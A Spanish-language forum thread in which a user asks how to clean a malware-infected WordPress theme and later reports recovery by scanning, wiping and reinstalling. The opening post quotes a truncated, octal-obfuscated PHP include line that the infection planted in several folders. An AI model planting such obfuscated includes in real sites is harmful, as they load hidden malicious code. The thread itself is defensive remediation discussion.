Limpieza de virus malware de sitio Wordpress

agataelectra · 30 Mayo, 2018 20:58

Hola como estan?
Estoy buscando recomendaciones para limpiar lso archivos de un theme de Wordpress que han sido infectados en el servidor que están. Hice una copia de seguridad del sitio completo, y sobre el malware me informaron esto:

> Cita

**el virus creó varias copias de un archivo index.html.bak.bak con este contenido: **
<?php
/c9c32/

@include "\057home\057bigj\157nan.\143om.a\162/pub\154ic_h\164ml/w\160-con\164ent/\160lugi\156s/cl\151ck-t\157-cha\164-f

esto se repite en varias carpetas. No se hasta que punto ha infectado las carpetas, lo que necesito es tener en limpio el theme para volver a instalarlo en otro servidor seguro.
Que me recomiendan?

mparraud · 31 Mayo, 2018 12:09

Encontré esta respuesta en stackoverflow post:

quizas te ayude.

agataelectra · 12 Junio, 2018 16:13

Buenísimo, me sirvió, rescaté los archivos del theme, luego examiné el código en búsqueda de código sospechoso con Quttera.
Borré todos los archivos de public_html, y pasé a otro servidor más seguro.
El Virus había creado trabajos de cron en el servidor.
Hice una instalación limpia de Wordpress y cargué nuevamente los plugins, theme, configuré algunos CSS nuevamente, todo funciona bien.
Gracias!

mparraud · 12 Junio, 2018 16:19

fijate que podes marcar como “resuelto” haciendo click en el icono de “checkbox” que aparece abajo.